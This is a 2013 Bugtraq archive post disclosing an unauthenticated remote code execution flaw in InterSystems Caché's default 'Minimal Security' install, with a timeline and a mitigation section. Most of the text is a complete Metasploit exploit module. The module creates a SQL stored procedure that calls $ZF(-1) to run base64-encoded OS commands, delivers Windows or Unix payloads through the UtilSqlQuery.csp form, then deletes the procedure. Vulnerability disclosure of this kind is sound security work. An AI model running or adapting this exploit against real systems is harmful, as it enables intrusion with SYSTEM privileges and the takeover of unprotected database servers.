Home page logo
/

bugtraq logo Bugtraq mailing list archives

Intersystems Cache Remote Code Execution (via Default 'Minimal Security' Install)
From: bruk0ut.sec () gmail com
Date: Tue, 19 Nov 2013 18:08:27 GMT

-------------------
1) Overview

Title: Intersystems Cache Remote Code Execution (via Default 'Minimal Security' Install)
Product: Intersystems Cache
Product URL: http://www.intersystems.com/cache/index.html
Vendor: Intersystems
Affected Versions: Tested on Cache for Windows x86-64 & i386 2009.* thru 2012.*
<= 2007.* may not achieve RCE.
=> 2013.* requires manual web UI usage but RCE can still be achieved by manually creating the SQL stored procedure and 
calling it via SELECT procname('cmd')
CVE-ID: None - vendor is aware of the insecure default "Minimal Security" mode. Furthermore the installer provides 
"Normal" and "Locked down" modes which must be selected in order to have some level of security.
Severity:  High
Credit: Bruk0ut

Disclosure timeline:
09/23/2013 - Vendor contacted and advised of highly insecure default configuration

09/24/2013 - Vendor responds to advise a case has been opened

10/08/2013 - Vendor responds to advise that product manager and developer group are looking into improving this initial 
default configuration and are closing the case

11/01/2013 - Vendor releases Cache version 2013.1.3 - according to change log this issue has not been addressed and no 
warning/advisory posted to advise customers against installing with default "'Minimal Security' configuration on 
http://www.intersystems.com/support/cflash/2013announce.html

11/18/2013 - Advisory and exploit disclosed to public

-------------------
2) Product information

"InterSystems Cache is an advanced object database that provides in-memory speed with persistence, and the ability to 
handle huge volumes of transactional data. Plus, it can run SQL faster than relational databases. Caché enables rapid 
Web application development, massive scalability, and real-time queries against transactional data – with minimal 
maintenance and hardware requirements"

-------------------
3) Advisory detail

The default installation of Intersystems Cache using the 'Minimal Security' mode, is very insecure in that the default 
"UnknownUser" mapping for anonymous user access to the web service (running on port TCP/57772 by default) - is granted 
privileges to "%All" roles,  which can be used to comprise the system on which Cache has been installed.

Particularly the unrestricted access to the Cache SQL engine (http://host/csp/sys/exp/UtilSqlQuery.csp) and the ability 
to create and execute stored procedures, results in allowing the use of the "Cache Object Script" language to be 
leveraged and thus one can achieve un-authenticated remote code execution with default SYSTEM privileges on windows 
systems, and with the non privileged 'cacheserver' user context on Linux systems.

Tested on Cache for Windows x86-64 & i386 2009.* thru 2012.*

Versions <= 2007.* have not been tested and possibly may not achieve RCE via UtilSqlQuery.csp

Versions => 2013.* requires manual web UI usage of the management portal 
(http://host/csp/sys/exp/%25CSP.UI.Portal.SQL.Home.zen) - but RCE can still be achieved by manually creating the SQL 
stored procedure and calling it via SELECT procname('cmd'). The reason for this is because from this version on, the 
management portal uses the CSPBroker service when dealing with HTTP POST requests, which adds a layer of complexity due 
to encrypting methods and functions with the user's session key. This is all abstracted by any JavaScript enabled 
browser but renders it difficult to script an exploit. Previous versions do NOT use the CSPBroker and use standard HTTP 
POST requests.

-------------------
4) Proof of Concept

attached is cache_rce_pack.zip which contains

a) cache_rce.py - a standalone python exploit that exploits the vulnerability using a self explanatory menu system (and 
in turn uses MultipartPostHandler.py for uploading files due to Cache's requirement of multipart-formdata enctype).

b) cache_minimal_sec_exec.rb - Metasploit module submitted to Rapid7 on 11/18/2013 - uses CMDStagerVBS for windows 
targets or generic UNIX CMD payloads for *nix targets. Also has the option for single/specific cmd execution (non 
stager or payload).
-------------------
5) Solution

Users should not use the default 'Minimal Security' setting during installation and should choose either 'Normal' or 
'Locked Down'.

If a Cache installation has been installed using the 'Minimal Security' setting, the info here should be reviewed and 
the installation locked down -> http://docs.intersystems.com/ens20091/csp/docbook/DocBook.UI.Page.cls?KEY=GCAS_tighten

Furthermore the default admin accounts should have their passwords reset.

-------------------
Contact

bruk0ut.sec  .::at::.  gmail com
PGP Key ID: 0xC570B9F4


================================================
================================================
================================================

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit
        Rank = GreatRanking

        include Msf::Exploit::Remote::HttpClient
        include Msf::Exploit::CmdStagerVBS
        include Msf::Exploit::FileDropper

        def initialize(info = {})
                super(update_info(info,
                        'Name'            => 'Intersystems Cache Remote Code Execution (via Default Minimal Security 
Install)',
                        'Description'     => %q{
                                This module exploits default installations of Intersystems Cache which use the 
'minimal' initial security settings, unless changed during/post installation.
                                Anonymous users are granted permissions to '%All' roles within Cache, allowing for 
remote code execution to be achieved by creating a Cache SQL stored procedure which leverages
                                the 'Cache Object Script' scripting engine to execute commands under the context of 
SYSTEM for default windows installations, or non privileged 'cacheserver' for default *nix installations.

                                },
                        'Author'          =>['Bruk0ut'],
                        'License'         => MSF_LICENSE,
                        'References'      =>[ 'URL', 'tbd'],
                        'DisclosureDate' => 'Nov 18 2013',
                        'Platform'       => ['win', 'unix'],
                        'Targets'        =>
                                [
                                        [
                                                'Windows Universal (CMDStagerVBS)',
                                                {
                                                        'Platform' => 'win',
                                                        'Arch' => ARCH_X86
                                                }
                                        ],

                                        [
                                                'Unix Universal (CMD)',
                                                {
                                                        'Platform' => 'unix',
                                                        'Arch' => ARCH_CMD
                                                }
                                        ]
                                ],
                        'DefaultTarget'  => 0,
                        'Privileged'     => true #SYSTEM for windows, non priv'd cacheserver acct for *nix
                        ))

                register_options(
                        [
                                Opt::RPORT(57772),
                                OptString.new('TARGETURI', [ true, 'Path to SqlQuery form', 
'/csp/sys/exp/UtilSqlQuery.csp']),
                                OptString.new('CMD', [ false, 'Execute this command instead of using command stager or 
Payload', "" ]),
                                OptString.new('STORED_PROC_NAME', [true, 'Stored Procedure name to 
create','random_alpha'])
                        ], self.class)

                register_advanced_options(
                        [
                                OptBool.new('DELETE_FILES', [ true, 'Delete the dropped files after exploitation', true 
])
                        ], self.class)
        end

        def check
                res = send_request_cgi(
                {
                        'uri' => target_uri.path,
                        'method' => 'GET',
                },20)

                if (res.code == 401 or res.code == 404 or res.body =~ /user name/ or res.body =~ /User Name/)
                        Exploit::CheckCode::Safe
                        # either not found or UtilSqlQuery.csp is protected by authentication (non default install)
                else
                        Exploit::CheckCode::Vulnerable
                end
        end



        def create_sql_procedure(procname)
                # create Cache SQL stored procedure which uses Cache Object Script to acheive arbritrary code execution
                print_status("Creating Cache SQL Stored Procedure: #{procname}")
                rce_func = "CREATE FUNCTION #{procname}(CMD TEXT) PROCEDURE RETURNS TEXT LANGUAGE OBJECTSCRIPT\n"
                rce_func << "{\n"
                rce_func << "Set rez = $ZF(-1, ##class(%SYSTEM.Encryption).Base64Decode(CMD))\r\n"
                rce_func << 'Write "rce_cmd_complete"' + "\r\n"
                rce_func << "}\r\n"
                res = send_request_cgi(
                {
                        'uri' => target_uri.path,
                        'method' => 'POST',
                        'vars_post' =>
                        {
                                '$NAMESPACE' => '%SYS',
                                '$CLASS' => '%CSP.UI.SQL.QueryForm',
                                '$FRAME' => '_top',
                                '$FORMURL' => Rex::Text.uri_encode(target_uri.path),
                                '$AUTOFORM_EXECUTE' => 'Execute Query',
                                'RuntimeMode' => 'Logical Mode',
                                'MaxRows' => '1000',
                                'IEworkaound' => '',
                                'Query' => rce_func
                        }
                },20)

                if (not res or res.code == 500 or res.code==404)
                        abort("Did not receive expected response... quitting")
                elsif (res.code == 401 or res.body =~ /user name/ or res.body =~ /User Name/)
                        abort("UtilSqlQuery.csp is protected by authentication... quitting")
                end

                #after initial form POST, server sends a 302 re-direct which must be followed to complete the request
                if (res.headers['LOCATION'])
                        exec_url = res.headers['LOCATION']
                        res = send_request_cgi(
                        {
                                'uri' => exec_url,
                                'method' => 'GET',
                        },20)
                else
                        abort("Could not parse exec url... quitting")
                end
        end

        def drop_sql_procedure(procname)
                #Stored Procedure cleanup... rm as no longer required
                print_status("Dropping Cache SQL Stored Procedure: #{procname}")
                res = send_request_cgi(
                {
                        'uri' => target_uri.path,
                        'method' => 'POST',
                        'vars_post' =>
                        {
                                '$NAMESPACE' => '%SYS',
                                '$CLASS' => '%CSP.UI.SQL.QueryForm',
                                '$FRAME' => '_top',
                                '$FORMURL' => Rex::Text.uri_encode(target_uri.path),
                                '$AUTOFORM_EXECUTE' => 'Execute Query',
                                'RuntimeMode' => 'Logical Mode',
                                'MaxRows' => '1000',
                                'IEworkaound' => '',
                                'Query' => "DROP FUNCTION #{procname}"
                        }
                },20)

                if (not res or res.code == 500 or res.code==404)
                        abort("Did not receive expected response... quitting")
                end

                #after initial form POST, server sends a 302 re-direct which must be followed to complete the request
                if (res.headers['LOCATION'])
                        exec_url = res.headers['LOCATION']
                        res = send_request_cgi(
                        {
                                'uri' => exec_url,
                                'method' => 'GET',
                        },20)
                else
                        abort("Could not parse exec url... quitting")
                end
        end


        def exploit
                #randomize stored procedure name
                if datastore['STORED_PROC_NAME'] == 'random_alpha'
                        datastore['STORED_PROC_NAME'] = rand_text_alpha(6)
                end

                #create stored procedure to acheive RCE
                create_sql_procedure(datastore['STORED_PROC_NAME'])

                #if CMD option is set, instead of using a payload, execute only this command, prefixed with 'cmd /c ' 
if target is Windows, or no prefix if *nix
                if not datastore['CMD'].empty?
                        if target.name =~ /Windows/
                                print_status("Executing command: cmd /c #{datastore['CMD']}")
                                execute_command("cmd /c #{datastore['CMD']}")
                        else
                                print_status("Executing command: #{datastore['CMD']}")
                                execute_command(datastore['CMD'])
                        end
                        return
                end

                #if target is Windows, launch payload via CMDStagerVBS
                if target.name =~ /Windows/
                        execute_cmdstager( { :linemax => 1500 })

                #if *nix, execute CMD payload directly
                else
                        print_status("Executing UNIX CMD Payload #{payload.encoded}")
                        execute_command(payload.encoded)
                end

                #clean up stored procedure
                drop_sql_procedure(datastore['STORED_PROC_NAME'])
                handler
        end

        def execute_command(cmd, opts = {})
                cmd = Rex::Text.encode_base64(cmd)
                #launch pre-created stored procedure and pass cmd as arg
                res = send_request_cgi(
                {
                        'uri' => target_uri.path,
                        'method' => 'POST',
                        'vars_post' =>
                        {
                                '$NAMESPACE' => '%SYS',
                                '$CLASS' => '%CSP.UI.SQL.QueryForm',
                                '$FRAME' => '_top',
                                '$FORMURL' => Rex::Text.uri_encode(target_uri.path),
                                '$AUTOFORM_EXECUTE' => 'Execute Query',
                                'RuntimeMode' => 'Logical Mode',
                                'MaxRows' => '1000',
                                'IEworkaound' => '',
                                'Query' => "SELECT #{datastore['STORED_PROC_NAME']}('#{cmd}')"
                        }
                },20)

                if (not res or res.code == 500 or res.code==404)
                        abort("Did not receive expected response... quitting")
                end

                #after initial form POST, server sends a 302 re-direct which must be followed to complete the request
                if (res.headers['LOCATION'])
                        exec_url = res.headers['LOCATION']
                        res = send_request_cgi(
                        {
                                'uri' => exec_url,
                                'method' => 'GET',
                        },20)
                else
                        abort("Could not parse exec url... quitting")

                end

                #stored procedure outputs the string below to confirm that it executed
                if not res.body =~ /rce_cmd_complete/
                        abort("Unable to confirm if SQL stored procedure can be executed properly... quitting")
                end
        end
end


  By Date           By Thread  

Current thread:
  • Intersystems Cache Remote Code Execution (via Default 'Minimal Security' Install) bruk0ut . sec (Nov 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault